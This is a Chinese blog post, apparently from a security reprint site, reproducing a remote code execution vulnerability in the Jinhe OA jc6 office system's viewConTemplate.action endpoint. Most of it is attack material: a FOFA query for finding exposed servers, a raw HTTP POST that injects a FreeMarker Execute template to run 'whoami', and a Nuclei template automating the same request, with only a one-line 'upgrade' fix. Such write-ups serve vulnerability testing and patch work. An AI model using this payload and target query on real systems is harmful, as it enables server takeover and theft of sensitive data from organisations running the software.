【漏洞复现】金和OA viewConTemplate.action RCE漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

Ⅰ、漏洞描述

金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

金和OA jc6系统viewConTemplate.action接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意代码命令获取服务器敏感信息,最终可能会导致服务器失陷。

Ⅱ、fofa语句

app="金和网络-金和OA"|| body="JHSoft.Web.AddMenu"|| body="/jc6/platform/" 

Ⅲ、漏洞复现

POC

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

moduId=1&code=<clob>${"freemarker.template.utility.Execute"?new()("whoami")}</clob>&uuid=1

1、发送数据包执行命令

Ⅳ、Nuclei-POC

id: JH-jc6-viewConTemplate-action-RCE

info:
  name: 金和OA jc6系统viewConTemplate.action接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意代码命令获取服务器敏感信息,最终可能会导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="金和网络-金和OA"|| body="JHSoft.Web.AddMenu"|| body="/jc6/platform/" 
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0

        moduId=1&code=<clob>${"freemarker.template.utility.Execute"?new()("whoami")}</clob>&uuid=1

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"</clob")

Ⅴ、修复建议

升级至安全版本

相关推荐

  1. 漏洞现】金OA XmlDeal.aspx XXE漏洞

    2024-03-14 08:26:04       37 阅读
  2. thinkphp漏洞

    2024-03-14 08:26:04       33 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-14 08:26:04       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-14 08:26:04       106 阅读
  3. 在Django里面运行非项目文件

    2024-03-14 08:26:04       87 阅读
  4. Python语言-面向对象

    2024-03-14 08:26:04       96 阅读

热门阅读

  1. 蓝桥杯2023年-砍树(dfs,树上差分)

    2024-03-14 08:26:04       35 阅读
  2. [Django 0-1] Core.Checks 模块

    2024-03-14 08:26:04       43 阅读
  3. 海康抓图保存路径失败NET_DVR_CaptureJPEGPicture

    2024-03-14 08:26:04       60 阅读
  4. js使用canvas实现图片鼠标滚轮放大缩小拖拽预览

    2024-03-14 08:26:04       47 阅读
  5. libigl 网格面片随机赋色

    2024-03-14 08:26:04       46 阅读
  6. 模型的参数量、计算量、延时等的关系

    2024-03-14 08:26:04       38 阅读
  7. C语言(指针)单元练习二

    2024-03-14 08:26:04       33 阅读
  8. C/C++蓝桥杯之解码问题

    2024-03-14 08:26:04       40 阅读